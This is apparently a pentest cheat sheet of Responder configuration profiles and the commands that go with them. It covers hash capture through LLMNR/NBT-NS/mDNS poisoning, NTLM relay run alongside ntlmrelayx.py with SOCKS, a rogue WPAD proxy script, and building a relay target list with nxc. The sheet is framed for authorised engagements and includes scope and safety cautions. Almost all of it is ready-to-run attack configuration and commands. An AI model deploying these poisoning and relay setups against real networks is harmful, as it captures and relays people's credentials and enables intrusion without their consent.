Responder Configuration Templates
Three recommended Responder.conf profiles for different engagement modes. The file lives at /usr/share/responder/Responder.conf on most installs.
Profile 1: Hash capture only (safe default)
Listens for LLMNR/NBT-NS/mDNS queries, serves rogue responses, captures NTLMv2. Does NOT attempt relay; hashes land in the Responder log.
[Responder Core]
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
MQTT = On
DCERPC = On
Challenge = 1122334455667788
[HTTP Server]
Serve-Always = Off
Serve-Exe = Off
Serve-Html = OffRun: sudo responder -I <iface> -wdF
Profile 2: Relay-ready
Disable Responder's SMB and HTTP listeners so ntlmrelayx.py can bind to them. Capture on other protocols still.
[Responder Core]
SQL = On
SMB = Off
RDP = On
Kerberos = On
HTTP = Off
HTTPS = Off
DNS = On
LDAP = On
MQTT = On
DCERPC = OnRun in parallel:
sudo responder -I eth0 -wdF
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -socksProfile 3: WPAD proxy
Serves a rogue WPAD configuration for authenticated HTTP capture.
[Responder Core]
HTTP = On
HTTPS = On
Serve-Always = On
[HTTP Server]
Serve-Always = On
Serve-Exe = Off
HtmlFilename = files/AccessDenied.html
[WPAD]
WPADScript = function FindProxyForURL(url, host){ if ((host == "localhost") || shExpMatch(host, "localhost.*") || (host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}Run: sudo responder -I eth0 -wdF --wpad
Generating a relay target list
# Hosts in scope with SMB signing NOT required (relay candidates)
nxc smb live.txt --gen-relay-list relay_targets.txt
# Cross-check against scope before relaying
comm -12 <(sort relay_targets.txt) <(sort scope_hosts.txt) > relay_safe.txtSafety
- Confirm scope allows poisoning — some customers restrict Responder to specific VLANs.
- Never run Responder on an engagement VPN's shared segment; you will poison other consultants.
- Kill-switch:
pkill -f Responder.pyleaves the listener sockets open briefly — verify withss -lntpbefore re-running.